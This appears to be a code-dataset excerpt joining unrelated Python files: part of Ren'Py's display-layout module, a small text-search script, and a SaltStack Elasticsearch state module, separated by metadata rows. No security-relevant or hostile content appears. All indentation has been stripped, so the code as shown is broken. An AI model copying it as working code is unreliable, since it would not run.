if self.style.box_reverse ^ self.style.order_reverse:
placements.reverse()
for child, x, y, w, h, surf in placements:
if full_width:
w = width
if full_height:
h = height
offset = child.place(rv, x, y, w, h, surf)
offsets.append(offset)
if self.style.order_reverse:
offsets.reverse()
self.offsets = offsets
return rv
def event(self, ev, x, y, st):
children_offsets = zip(self.children, self.offsets, self.start_times)
if not self.style.order_reverse:
children_offsets.reverse()
try:
for i, (xo, yo), t in children_offsets:
if t is None:
cst = st
else:
cst = renpy.game.interface.event_time - t
rv = i.event(ev, x - xo, y - yo, cst)
if rv is not None:
return rv
except IgnoreLayers:
if self.layers:
return None
else:
raise
return None
def Fixed(**properties):
return MultiBox(layout='fixed', **properties)
class SizeGroup(renpy.object.Object):
def __init__(self):
super(SizeGroup, self).__init__()
self.members = [ ]
self._width = None
self.computing_width = False
def width(self, width, height, st, at):
if self._width is not None:
return self._width
if self.computing_width:
return 0
self.computing_width = True
maxwidth = 0
for i in self.members:
rend = renpy.display.render.render(i, width, height, st, at)
maxwidth = max(rend.width, maxwidth)
renpy.display.render.invalidate(i)
self._width = maxwidth
self.computing_width = False
return maxwidth
size_groups = dict()
class Window(Container):
"""
A window that has padding and margins, and can place a background
behind its child. `child` is the child added to this
displayable. All other properties are as for the :ref:`Window`
screen language statement.
"""
def __init__(self, child=None, style='window', **properties):
super(Window, self).__init__(style=style, **properties)
if child is not None:
self.add(child)
def visit(self):
return [ self.style.background ] + self.children
def get_child(self):
return self.style.child or self.child
def per_interact(self):
size_group = self.style.size_group
if size_group:
group = size_groups.get(size_group, None)
if group is None:
group = size_groups[size_group] = SizeGroup()
group.members.append(self)
def predict_one(self):
pd = renpy.display.predict.displayable
self.style._predict_window(pd)
def render(self, width, height, st, at):
# save some typing.
style = self.style
xminimum = scale(style.xminimum, width)
yminimum = scale(style.yminimum, height)
size_group = self.style.size_group
if size_group and size_group in size_groups:
xminimum = max(xminimum, size_groups[size_group].width(width, height, st, at))
left_margin = scale(style.left_margin, width)
left_padding = scale(style.left_padding, width)
right_margin = scale(style.right_margin, width)
right_padding = scale(style.right_padding, width)
top_margin = scale(style.top_margin, height)
top_padding = scale(style.top_padding, height)
bottom_margin = scale(style.bottom_margin, height)
bottom_padding = scale(style.bottom_padding, height)
# c for combined.
cxmargin = left_margin + right_margin
cymargin = top_margin + bottom_margin
cxpadding = left_padding + right_padding
cypadding = top_padding + bottom_padding
child = self.get_child()
# Render the child.
surf = render(child,
width - cxmargin - cxpadding,
height - cymargin - cypadding,
st, at)
sw, sh = surf.get_size()
# If we don't fill, shrink our size to fit.
if not style.xfill:
width = max(cxmargin + cxpadding + sw, xminimum)
if not style.yfill:
height = max(cymargin + cypadding + sh, yminimum)
rv = renpy.display.render.Render(width, height)
# Draw the background. The background should render at exactly the
# requested size. (That is, be a Frame or a Solid).
if style.background:
bw = width - cxmargin
bh = height - cymargin
back = render(style.background, bw, bh, st, at)
style.background.place(rv, left_margin, top_margin, bw, bh, back, main=False)
offsets = child.place(rv,
left_margin + left_padding,
top_margin + top_padding,
width - cxmargin - cxpadding,
height - cymargin - cypadding,
surf)
# Draw the foreground. The background should render at exactly the
# requested size. (That is, be a Frame or a Solid).
if style.foreground:
bw = width - cxmargin
bh = height - cymargin
back = render(style.foreground, bw, bh, st, at)
style.foreground.place(rv, left_margin, top_margin, bw, bh, back, main=False)
if self.child:
self.offsets = [ offsets ]
self.window_size = width, height # W0201
return rv
def dynamic_displayable_compat(st, at, expr):
child = renpy.python.py_eval(expr)
return child, None
class DynamicDisplayable(renpy.display.core.Displayable):
"""
:doc: disp_dynamic
A displayable that can change its child based on a Python
function, over the course of an interaction.
`function`
A function that is called with the arguments:
* The amount of time the displayable has been shown for.
* The amount of time any displayable with the same tag has been shown for.
* Any positional or keyword arguments supplied to DynamicDisplayable.
and should return a (d, redraw) tuple, where:
* `d` is a displayable to show.
* `redraw` is the amount of time to wait before calling the
function again, or None to not call the function again
before the start of the next interaction.
`function` is called at the start of every interaction.
As a special case, `function` may also be a python string that evaluates
to a displayable. In that case, function is run once per interaction.
::
# If tooltip is not empty, shows it in a text. Otherwise,
# show Null. Checks every tenth of a second to see if the
# tooltip has been updated.
init python:
def show_tooltip(st, at):
if tooltip:
return tooltip, .1
else:
return Null()
image tooltipper = DynamicDisplayable(show_tooltip)
"""
nosave = [ 'child' ]
def after_setstate(self):
self.child = None
def __init__(self, function, *args, **kwargs):
super(DynamicDisplayable, self).__init__()
self.child = None
if isinstance(function, basestring):
args = ( function, )
kwargs = { }
function = dynamic_displayable_compat
self.predict_function = kwargs.pop("_predict_function", None)
self.function = function
self.args = args
self.kwargs = kwargs
def visit(self):
return [ ]
def update(self, st, at):
child, redraw = self.function(st, at, *self.args, **self.kwargs)
child = renpy.easy.displayable(child)
child.visit_all(lambda c : c.per_interact())
self.child = child
if redraw is not None:
renpy.display.render.redraw(self, redraw)
def per_interact(self):
renpy.display.render.redraw(self, 0)
def render(self, w, h, st, at):
self.update(st, at)
return renpy.display.render.render(self.child, w, h, st, at)
def predict_one(self):
if not self.predict_function:
return
for i in self.predict_function(*self.args, **self.kwargs):
if i is not None:
renpy.display.predict.displayable(i)
def get_placement(self):
if not self.child:
self.update(0, 0)
return self.child.get_placement()
def event(self, ev, x, y, st):
if self.child:
return self.child.event(ev, x, y, st)
# A cache of compiled conditions used by ConditionSwitch.
cond_cache = { }
# This chooses the first member of switch that's being shown on the
# given layer.
def condition_switch_pick(switch):
for cond, d in switch:
if cond is None:
return d
if cond in cond_cache:
code = cond_cache[cond]
else:
code = renpy.python.py_compile(cond, 'eval')
cond_cache[cond] = code
if renpy.python.py_eval_bytecode(code):
return d
raise Exception("Switch could not choose a displayable.")
def condition_switch_show(st, at, switch):
return condition_switch_pick(switch), None
def condition_switch_predict(switch):
if renpy.game.lint:
return [ d for _cond, d in switch ]
return [ condition_switch_pick(switch) ]
def ConditionSwitch(*args, **kwargs):
"""
:doc: disp_dynamic
This is a displayable that changes what it is showing based on
python conditions. The positional argument should be given in
groups of two, where each group consists of:
* A string containing a python condition.
* A displayable to use if the condition is true.
The first true condition has its displayable shown, at least
one condition should always be true.
::
image jill = ConditionSwitch(
"jill_beers > 4", "jill_drunk.png",
"True", "jill_sober.png")
"""
kwargs.setdefault('style', 'default')
switch = [ ]
if len(args) % 2 != 0:
raise Exception('ConditionSwitch takes an even number of arguments')
for cond, d in zip(args[0::2], args[1::2]):
if cond not in cond_cache:
code = renpy.python.py_compile(cond, 'eval')
cond_cache[cond] = code
d = renpy.easy.displayable(d)
switch.append((cond, d))
rv = DynamicDisplayable(condition_switch_show,
switch,
_predict_function=condition_switch_predict)
return Position(rv, **kwargs)
def ShowingSwitch(*args, **kwargs):
"""
:doc: disp_dynamic
This is a displayable that changes what it is showing based on the
images are showing on the screen. The positional argument should
be given in groups of two, where each group consists of:
* A string giving an image name, or None to indicate the default.
* A displayable to use if the condition is true.
A default image should be specified.
One use of ShowingSwitch is to have side images change depending on
the current emotion of a character. For example::
define e = Character("Eileen",
show_side_image=ShowingSwitch(
"eileen happy", Image("eileen_happy_side.png", xalign=1.0, yalign=1.0),
"eileen vhappy", Image("eileen_vhappy_side.png", xalign=1.0, yalign=1.0),
None, Image("eileen_happy_default.png", xalign=1.0, yalign=1.0),
)
)
"""
layer = kwargs.pop('layer', 'master')
if len(args) % 2 != 0:
raise Exception('ShowingSwitch takes an even number of positional arguments')
condargs = [ ]
for name, d in zip(args[0::2], args[1::2]):
if name is not None:
if not isinstance(name, tuple):
name = tuple(name.split())
cond = "renpy.showing(%r, layer=%r)" % (name, layer)
else:
cond = None
condargs.append(cond)
condargs.append(d)
return ConditionSwitch(*condargs, **kwargs)
class IgnoresEvents(Container):
def __init__(self, child, **properties):
super(IgnoresEvents, self).__init__(**properties)
self.add(child)
def render(self, w, h, st, at):
cr = renpy.display.render.render(self.child, w, h, st, at)
cw, ch = cr.get_size()
rv = renpy.display.render.Render(cw, ch)
rv.blit(cr, (0, 0), focus=False)
return rv
def get_placement(self):
return self.child.get_placement()
# Ignores events.
def event(self, ev, x, y, st):
return None
def edgescroll_proportional(n):
"""
An edgescroll function that causes the move speed to be proportional
from the edge distance.
"""
return n
class Viewport(Container):
__version__ = 5
def after_upgrade(self, version):
if version < 1:
self.xadjustment = renpy.display.behavior.Adjustment(1, 0)
self.yadjustment = renpy.display.behavior.Adjustment(1, 0)
self.set_adjustments = False
self.mousewheel = False
self.draggable = False
self.width = 0
self.height = 0
if version < 2:
self.drag_position = None
if version < 3:
self.edge_size = False
self.edge_speed = False
self.edge_function = None
self.edge_xspeed = 0
self.edge_yspeed = 0
self.edge_last_st = None
if version < 4:
self.xadjustment_param = None
self.yadjustment_param = None
self.offsets_param = (None, None)
self.set_adjustments_param = True
self.xinitial_param = None
self.yinitial_param = None
if version < 5:
self.focusable = self.draggable
def __init__(self,
child=None,
child_size=(None, None),
offsets=(None, None),
xadjustment=None,
yadjustment=None,
set_adjustments=True,
mousewheel=False,
draggable=False,
edgescroll=None,
style='viewport',
xinitial=None,
yinitial=None,
replaces=None,
**properties):
super(Viewport, self).__init__(style=style, **properties)
if child is not None:
self.add(child)
self.xadjustment_param = xadjustment
self.yadjustment_param = yadjustment
self.offsets_param = offsets
self.set_adjustments_param = set_adjustments
self.xinitial_param = xinitial
self.yinitial_param = yinitial
self._show()
if isinstance(replaces, Viewport):
self.xadjustment.range = replaces.xadjustment.range
self.yadjustment.range = replaces.yadjustment.range
self.xadjustment.value = replaces.xadjustment.value
self.yadjustment.value = replaces.yadjustment.value
self.xoffset = replaces.xoffset
self.yoffset = replaces.yoffset
self.drag_position = replaces.drag_position
else:
self.drag_position = None
self.child_width, self.child_height = child_size
self.mousewheel = mousewheel
self.draggable = draggable
# Layout participates in the focus system so drags get migrated.
self.focusable = draggable
self.width = 0
self.height = 0
# The speed at which we scroll in the x and y directions, in pixels
# per second.
self.edge_xspeed = 0
self.edge_yspeed = 0
# The last time we edgescrolled.
self.edge_last_st = None
if edgescroll is not None:
# The size of the edges that trigger scrolling.
self.edge_size = edgescroll[0]
# How far from the edge we can scroll.
self.edge_speed = edgescroll[1]
if len(edgescroll) >= 3:
self.edge_function = edgescroll[2]
else:
self.edge_function = edgescroll_proportional
else:
self.edge_size = 0
self.edge_speed = 0
self.edge_function = edgescroll_proportional
def _show(self):
if self.xadjustment_param is None:
self.xadjustment = renpy.display.behavior.Adjustment(1, 0)
else:
self.xadjustment = self.xadjustment_param
if self.yadjustment_param is None:
self.yadjustment = renpy.display.behavior.Adjustment(1, 0)
else:
self.yadjustment = self.yadjustment_param
if self.xadjustment.adjustable is None:
self.xadjustment.adjustable = True
if self.yadjustment.adjustable is None:
self.yadjustment.adjustable = True
self.set_adjustments = self.set_adjustments_param
offsets = self.offsets_param
self.xoffset = offsets[0] if (offsets[0] is not None) else self.xinitial_param
self.yoffset = offsets[1] if (offsets[1] is not None) else self.yinitial_param
def per_interact(self):
self.xadjustment.register(self)
self.yadjustment.register(self)
def render(self, width, height, st, at):
self.width = width
self.height = height
child_width = self.child_width or width
child_height = self.child_height or height
surf = render(self.child, child_width, child_height, st, at)
cw, ch = surf.get_size()
if not self.style.xfill:
width = min(cw, width)
if not self.style.yfill:
height = min(ch, height)
if self.set_adjustments:
self.xadjustment.range = max(cw - width, 0)
self.xadjustment.page = width
self.yadjustment.range = max(ch - height, 0)
self.yadjustment.page = height
if self.xoffset is not None:
if isinstance(self.xoffset, int):
value = self.xoffset
else:
value = max(cw - width, 0) * self.xoffset
self.xadjustment.value = value
if self.yoffset is not None:
if isinstance(self.yoffset, int):
value = self.yoffset
else:
value = max(ch - height, 0) * self.yoffset
self.yadjustment.value = value
if self.edge_size and (self.edge_last_st is not None) and (self.edge_xspeed or self.edge_yspeed):
duration = max(st - self.edge_last_st, 0)
self.xadjustment.change(self.xadjustment.value + duration * self.edge_xspeed)
self.yadjustment.change(self.yadjustment.value + duration * self.edge_yspeed)
self.check_edge_redraw(st)
cxo = -int(self.xadjustment.value)
cyo = -int(self.yadjustment.value)
self.offsets = [ (cxo, cyo) ]
rv = renpy.display.render.Render(width, height)
rv.blit(surf, (cxo, cyo))
return rv
def check_edge_redraw(self, st):
redraw = False
if (self.edge_xspeed > 0) and (self.xadjustment.value < self.xadjustment.range):
redraw = True
if (self.edge_xspeed < 0) and (self.xadjustment.value > 0):
redraw = True
if (self.edge_yspeed > 0) and (self.yadjustment.value < self.yadjustment.range):
redraw = True
if (self.edge_yspeed < 0) and (self.yadjustment.value > 0):
redraw = True
if redraw:
renpy.display.render.redraw(self, 0)
self.edge_last_st = st
else:
self.edge_last_st = None
def event(self, ev, x, y, st):
self.xoffset = None
self.yoffset = None
rv = super(Viewport, self).event(ev, x, y, st)
if rv is not None:
return rv
if self.draggable and renpy.display.focus.get_grab() == self:
oldx, oldy = self.drag_position
dx = x - oldx
dy = y - oldy
self.xadjustment.change(self.xadjustment.value - dx)
self.yadjustment.change(self.yadjustment.value - dy)
self.drag_position = (x, y) # W0201
if renpy.display.behavior.map_event(ev, 'viewport_drag_end'):
renpy.display.focus.set_grab(None)
raise renpy.display.core.IgnoreEvent()
if not ((0 <= x < self.width) and (0 <= y <= self.height)):
return
if self.mousewheel:
if renpy.display.behavior.map_event(ev, 'viewport_up'):
rv = self.yadjustment.change(self.yadjustment.value - self.yadjustment.step)
if rv is not None:
return rv
else:
raise renpy.display.core.IgnoreEvent()
if renpy.display.behavior.map_event(ev, 'viewport_down'):
rv = self.yadjustment.change(self.yadjustment.value + self.yadjustment.step)
if rv is not None:
return rv
else:
raise renpy.display.core.IgnoreEvent()
if self.draggable:
if renpy.display.behavior.map_event(ev, 'viewport_drag_start'):
self.drag_position = (x, y)
renpy.display.focus.set_grab(self)
raise renpy.display.core.IgnoreEvent()
if self.edge_size and ev.type in [ pygame.MOUSEMOTION, pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP ]:
def speed(n, zero, one):
"""
Given a position `n`, computes the speed. The speed is 0.0
when `n` == `zero`, 1.0 when `n` == `one`, and linearly
interpolated when between.
Returns 0.0 when outside the bounds - in either direction.
"""
n = 1.0 * (n - zero) / (one - zero)
if n < 0.0:
return 0.0
if n > 1.0:
return 0.0
return n
xspeed = speed(x, self.width - self.edge_size, self.width)
xspeed -= speed(x, self.edge_size, 0)
self.edge_xspeed = self.edge_speed * self.edge_function(xspeed)
yspeed = speed(y, self.height - self.edge_size, self.height)
yspeed -= speed(y, self.edge_size, 0)
self.edge_yspeed = self.edge_speed * self.edge_function(yspeed)
if xspeed or yspeed:
self.check_edge_redraw(st)
else:
self.edge_last_st = None
return None
def set_xoffset(self, offset):
self.xoffset = offset
renpy.display.render.redraw(self, 0)
def set_yoffset(self, offset):
self.yoffset = offset
renpy.display.render.redraw(self, 0)
def LiveCrop(rect, child, **properties):
"""
:doc: disp_imagelike
This created a displayable by cropping `child` to `rect`, where
`rect` is an (x, y, width, height) tuple. ::
image eileen cropped = LiveCrop((0, 0, 300, 300), "eileen happy")
"""
x, y, w, h = rect
return Viewport(child, offsets=(x, y), xmaximum=w, ymaximum=h, **properties)
class Side(Container):
possible_positions = set([ 'tl', 't', 'tr', 'r', 'br', 'b', 'bl', 'l', 'c'])
def after_setstate(self):
self.sized = False
def __init__(self, positions, style='side', **properties):
super(Side, self).__init__(style=style, **properties)
if isinstance(positions, basestring):
positions = positions.split()
for i in positions:
if not i in Side.possible_positions:
raise Exception("Side used with impossible position '%s'." % (i,))
self.positions = tuple(positions)
self.sized = False
def _clear(self):
super(Side, self)._clear()
self.sized = False
def render(self, width, height, st, at):
pos_d = { }
pos_i = { }
for i, (pos, d) in enumerate(zip(self.positions, self.children)):
pos_d[pos] = d
pos_i[pos] = i
# Figure out the size of each widget (and hence where the
# widget needs to be placed).
if not self.sized:
self.sized = True
# Deal with various spacings.
spacing = self.style.spacing
def spacer(a, b, c, axis):
if (a in pos_d) or (b in pos_d) or (c in pos_d):
return spacing, axis - spacing
else:
return 0, axis
self.left_space, width = spacer('tl', 'l', 'bl', width) # W0201
self.right_space, width = spacer('tr', 'r', 'br', width) # W0201
self.top_space, height = spacer('tl', 't', 'tr', height) # W0201
self.bottom_space, height = spacer('bl', 'b', 'br', height) # W0201
# The sizes of the various borders.
left = 0
right = 0
top = 0
bottom = 0
cwidth = 0
cheight = 0
def sizeit(pos, width, height, owidth, oheight):
if pos not in pos_d:
return owidth, oheight
rend = render(pos_d[pos], width, height, st, at)
rv = max(owidth, rend.width), max(oheight, rend.height)
rend.kill()
return rv
cwidth, cheight = sizeit('c', width, height, 0, 0)
cwidth, top = sizeit('t', cwidth, height, cwidth, top)
cwidth, bottom = sizeit('b', cwidth, height, cwidth, bottom)
left, cheight = sizeit('l', width, cheight, left, cheight)
right, cheight = sizeit('r', width, cheight, right, cheight)
left, top = sizeit('tl', left, top, left, top)
left, bottom = sizeit('bl', left, bottom, left, bottom)
right, top = sizeit('tr', right, top, right, top)
right, bottom = sizeit('br', right, bottom, right, bottom)
self.cwidth = cwidth # W0201
self.cheight = cheight # W0201
self.top = top # W0201
self.bottom = bottom # W0201
self.left = left # W0201
self.right = right # W0201
else:
cwidth = self.cwidth
cheight = self.cheight
top = self.top
bottom = self.bottom
left = self.left
right = self.right
# Now, place everything onto the render.
self.offsets = [ None ] * len(self.children)
lefts = self.left_space
rights = self.right_space
tops = self.top_space
bottoms = self.bottom_space
cwidth = min(cwidth, width - left - lefts - right - rights)
cheight = min(cheight, height - top - tops - bottom - bottoms)
rv = renpy.display.render.Render(left + lefts + cwidth + rights + right,
top + tops + cheight + bottoms + bottom)
def place(pos, x, y, w, h):
if pos not in pos_d:
return
d = pos_d[pos]
i = pos_i[pos]
rend = render(d, w, h, st, at)
self.offsets[i] = pos_d[pos].place(rv, x, y, w, h, rend)
col1 = 0
col2 = left + lefts
col3 = left + lefts + cwidth + rights
row1 = 0
row2 = top + tops
row3 = top + tops + cheight + bottoms
place('c', col2, row2, cwidth, cheight)
place('t', col2, row1, cwidth, top)
place('r', col3, row2, right, cheight)
place('b', col2, row3, cwidth, bottom)
place('l', col1, row2, left, cheight)
place('tl', col1, row1, left, top)
place('tr', col3, row1, right, top)
place('br', col3, row3, right, bottom)
place('bl', col1, row3, left, bottom)
return rv
class Alpha(renpy.display.core.Displayable):
def __init__(self, start, end, time, child=None, repeat=False, bounce=False,
anim_timebase=False, time_warp=None, **properties):
super(Alpha, self).__init__(**properties)
self.start = start
self.end = end
self.time = time
self.child = renpy.easy.displayable(child)
self.repeat = repeat
self.anim_timebase = anim_timebase
self.time_warp = time_warp
def visit(self):
return [ self.child ]
def render(self, height, width, st, at):
if self.anim_timebase:
t = at
else:
t = st
if self.time:
done = min(t / self.time, 1.0)
else:
done = 1.0
if renpy.game.less_updates:
done = 1.0
elif self.repeat:
done = done % 1.0
renpy.display.render.redraw(self, 0)
elif done != 1.0:
renpy.display.render.redraw(self, 0)
if self.time_warp:
done = self.time_warp(done)
alpha = self.start + done * (self.end - self.start)
rend = renpy.display.render.render(self.child, height, width, st, at)
w, h = rend.get_size()
rv = renpy.display.render.Render(w, h)
rv.blit(rend, (0, 0))
rv.alpha = alpha
return rv
class AdjustTimes(Container):
def __init__(self, child, start_time, anim_time, **properties):
super(AdjustTimes, self).__init__(**properties)
self.start_time = start_time
self.anim_time = anim_time
self.add(child)
def render(self, w, h, st, at):
if self.start_time is None:
self.start_time = renpy.game.interface.frame_time
if self.anim_time is None:
self.anim_time = renpy.game.interface.frame_time
st = renpy.game.interface.frame_time - self.start_time
at = renpy.game.interface.frame_time - self.anim_time
cr = renpy.display.render.render(self.child, w, h, st, at)
cw, ch = cr.get_size()
rv = renpy.display.render.Render(cw, ch)
rv.blit(cr, (0, 0))
self.offsets = [ (0, 0) ]
return rv
def get_placement(self):
return self.child.get_placement()
class LiveTile(Container):
"""
:doc: disp_imagelike
Tiles `child` until it fills the area allocated to this displayable.
::
image bg tile = LiveTile("bg.png")
"""
def __init__(self, child, style='tile', **properties):
super(LiveTile, self).__init__(style=style, **properties)
self.add(child)
def render(self, width, height, st, at):
cr = renpy.display.render.render(self.child, width, height, st, at)
cw, ch = cr.get_size()
rv = renpy.display.render.Render(width, height)
width = int(width)
height = int(height)
cw = int(cw)
ch = int(ch)
for y in range(0, height, ch):
for x in range(0, width, cw):
rv.blit(cr, (x, y), focus=False)
return rv
class Flatten(Container):
"""
:doc: disp_imagelike
This flattens `child`, which may be made up of multiple textures, into
a single texture.
Certain operations, like the alpha transform property, apply to every
texture making up a displayable, which can yield incorrect results
when the textures overlap on screen. Flatten creates a single texture
from multiple textures, which can prevent this problem.
Flatten is a relatively expensive operation, and so should only be used
when absolutely required.
"""
def __init__(self, child, **properties):
super(Flatten, self).__init__(**properties)
self.add(child)
def render(self, width, height, st, at):
cr = renpy.display.render.render(self.child, width, height, st, at)
cw, ch = cr.get_size()
tex = cr.render_to_texture(True)
rv = renpy.display.render.Render(cw, ch)
rv.blit(tex, (0, 0))
rv.depends_on(cr, focus=True)
return rv
| 28.688819 | 110 | 0.565485 |
acfa7b977a45e4f251d02b3fab9297d506c304a1 | 646 | py | Python | ag_directories/ag.py | Shekcon/Ag | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | 1 | 2018-09-15T14:00:45.000Z | 2018-09-15T14:00:45.000Z | ag_directories/ag.py | Shekcon/Personer-Project | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | null | null | null | ag_directories/ag.py | Shekcon/Personer-Project | 2724ae2380d51bc2653320715b23640a358aa855 | [
"MIT"
] | null | null | null | from os import getcwd
from os.path import isfile
from get_input import find_pattern_path, check_option
from colect_open_files import open_file, colect_files_subdirectory
if __name__ == "__main__":
list_option = check_option()
pattern, path = find_pattern_path()
'''
what options is use
'''
option = '--case-sensitive' if '--case-sensitive' in list_option else None
if path != getcwd and isfile(path):
''' path is file '''
open_file(path, pattern, option)
else:
files = colect_files_subdirectory(path, list_option)
for file in files:
open_file(file, pattern, option)
| 28.086957 | 78 | 0.679567 |
acfa7cd4a7981e69fe3bd3697bd82c9f454bac73 | 17,983 | py | Python | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 5 | 2018-05-01T20:51:14.000Z | 2021-11-09T05:43:00.000Z | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 4 | 2019-02-08T17:53:38.000Z | 2019-06-06T16:17:27.000Z | salt/states/elasticsearch.py | johnskopis/salt | 86adb6b0fe40230b8be4c74229e897a7a08f81a6 | [
"Apache-2.0"
] | 7 | 2017-09-29T18:49:53.000Z | 2021-11-09T05:42:49.000Z | # -*- coding: utf-8 -*-
'''
State module to manage Elasticsearch.
.. versionadded:: 2017.7.0
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
# Import salt libs
from salt.ext import six
import salt.utils.json
log = logging.getLogger(__name__)
def index_absent(name):
'''
Ensure that the named index is absent.
name
Name of the index to remove
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
index = __salt__['elasticsearch.index_get'](index=name)
if index and name in index:
if __opts__['test']:
ret['comment'] = 'Index {0} will be removed'.format(name)
ret['changes']['old'] = index[name]
ret['result'] = None
else:
ret['result'] = __salt__['elasticsearch.index_delete'](index=name)
if ret['result']:
ret['comment'] = 'Successfully removed index {0}'.format(name)
ret['changes']['old'] = index[name]
else:
ret['comment'] = 'Failed to remove index {0} for unknown reasons'.format(name)
else:
ret['comment'] = 'Index {0} is already absent'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def index_present(name, definition=None):
'''
Ensure that the named index is present.
name
Name of the index to add
definition
Optional dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-create-index.html
**Example:**
.. code-block:: yaml
# Default settings
mytestindex:
elasticsearch_index.present
# Extra settings
mytestindex2:
elasticsearch_index.present:
- definition:
settings:
index:
number_of_shards: 10
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
index_exists = __salt__['elasticsearch.index_exists'](index=name)
if not index_exists:
if __opts__['test']:
ret['comment'] = 'Index {0} does not exist and will be created'.format(name)
ret['changes'] = {'new': definition}
ret['result'] = None
else:
output = __salt__['elasticsearch.index_create'](index=name, body=definition)
if output:
ret['comment'] = 'Successfully created index {0}'.format(name)
ret['changes'] = {'new': __salt__['elasticsearch.index_get'](index=name)[name]}
else:
ret['result'] = False
ret['comment'] = 'Cannot create index {0}, {1}'.format(name, output)
else:
ret['comment'] = 'Index {0} is already present'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def alias_absent(name, index):
'''
Ensure that the index alias is absent.
name
Name of the index alias to remove
index
Name of the index for the alias
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
alias = __salt__['elasticsearch.alias_get'](aliases=name, indices=index)
if alias and alias.get(index, {}).get("aliases", {}).get(name, None) is not None:
if __opts__['test']:
ret['comment'] = 'Alias {0} for index {1} will be removed'.format(name, index)
ret['changes']['old'] = alias.get(index, {}).get("aliases", {}).get(name, {})
ret['result'] = None
else:
ret['result'] = __salt__['elasticsearch.alias_delete'](aliases=name, indices=index)
if ret['result']:
ret['comment'] = 'Successfully removed alias {0} for index {1}'.format(name, index)
ret['changes']['old'] = alias.get(index, {}).get("aliases", {}).get(name, {})
else:
ret['comment'] = 'Failed to remove alias {0} for index {1} for unknown reasons'.format(name, index)
else:
ret['comment'] = 'Alias {0} for index {1} is already absent'.format(name, index)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def alias_present(name, index, definition=None):
'''
Ensure that the named index alias is present.
name
Name of the alias
index
Name of the index
definition
Optional dict for filters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html
**Example:**
.. code-block:: yaml
mytestalias:
elasticsearch.alias_present:
- index: testindex
- definition:
filter:
term:
user: kimchy
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
alias = __salt__['elasticsearch.alias_get'](aliases=name, indices=index)
old = {}
if alias:
old = alias.get(index, {}).get("aliases", {}).get(name, {})
if not definition:
definition = {}
ret['changes'] = __utils__['dictdiffer.deep_diff'](old, definition)
if ret['changes'] or not definition:
if __opts__['test']:
if not old:
ret['comment'] = 'Alias {0} for index {1} does not exist and will be created'.format(name, index)
else:
ret['comment'] = 'Alias {0} for index {1} exists with wrong configuration and will be overridden'.format(name, index)
ret['result'] = None
else:
output = __salt__['elasticsearch.alias_create'](alias=name, indices=index, body=definition)
if output:
if not old:
ret['comment'] = 'Successfully created alias {0} for index {1}'.format(name, index)
else:
ret['comment'] = 'Successfully replaced alias {0} for index {1}'.format(name, index)
else:
ret['result'] = False
ret['comment'] = 'Cannot create alias {0} for index {1}, {2}'.format(name, index, output)
else:
ret['comment'] = 'Alias {0} for index {1} is already present'.format(name, index)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def index_template_absent(name):
'''
Ensure that the named index template is absent.
name
Name of the index to remove
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
index_template = __salt__['elasticsearch.index_template_get'](name=name)
if index_template and name in index_template:
if __opts__['test']:
ret['comment'] = 'Index template {0} will be removed'.format(name)
ret['changes']['old'] = index_template[name]
ret['result'] = None
else:
ret['result'] = __salt__['elasticsearch.index_template_delete'](name=name)
if ret['result']:
ret['comment'] = 'Successfully removed index template {0}'.format(name)
ret['changes']['old'] = index_template[name]
else:
ret['comment'] = 'Failed to remove index template {0} for unknown reasons'.format(name)
else:
ret['comment'] = 'Index template {0} is already absent'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
def index_template_present(name, definition, check_definition=False):
'''
Ensure that the named index template is present.
name
Name of the index to add
definition
Required dict for creation parameters as per https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-templates.html
check_definition
If the template already exists and the definition is up to date
**Example:**
.. code-block:: yaml
mytestindex2_template:
elasticsearch.index_template_present:
- definition:
template: logstash-*
order: 1
settings:
number_of_shards: 1
'''
ret = {'name': name, 'changes': {}, 'result': True, 'comment': ''}
try:
index_template_exists = __salt__['elasticsearch.index_template_exists'](name=name)
if not index_template_exists:
if __opts__['test']:
ret['comment'] = 'Index template {0} does not exist and will be created'.format(name)
ret['changes'] = {'new': definition}
ret['result'] = None
else:
output = __salt__['elasticsearch.index_template_create'](name=name, body=definition)
if output:
ret['comment'] = 'Successfully created index template {0}'.format(name)
ret['changes'] = {'new': __salt__['elasticsearch.index_template_get'](name=name)[name]}
else:
ret['result'] = False
ret['comment'] = 'Cannot create index template {0}, {1}'.format(name, output)
else:
if check_definition:
if isinstance(definition, str):
definition_parsed = salt.utils.json.loads(definition)
else:
definition_parsed = definition
current_template = __salt__['elasticsearch.index_template_get'](name=name)[name]
# Prune empty keys (avoid false positive diff)
for key in ("mappings", "aliases", "settings"):
if current_template[key] == {}:
del current_template[key]
diff = __utils__['dictdiffer.deep_diff'](current_template, definition_parsed)
if diff:
if __opts__['test']:
ret['comment'] = 'Index template {0} exist but need to be updated'.format(name)
ret['changes'] = diff
ret['result'] = None
else:
output = __salt__['elasticsearch.index_template_create'](name=name, body=definition)
if output:
ret['comment'] = 'Successfully updated index template {0}'.format(name)
ret['changes'] = diff
else:
ret['result'] = False
ret['comment'] = 'Cannot update index template {0}, {1}'.format(name, output)
else:
ret['comment'] = 'Index template {0} is already present and up to date'.format(name)
else:
ret['comment'] = 'Index template {0} is already present'.format(name)
except Exception as err:
ret['result'] = False
ret['comment'] = six.text_type(err)
return ret
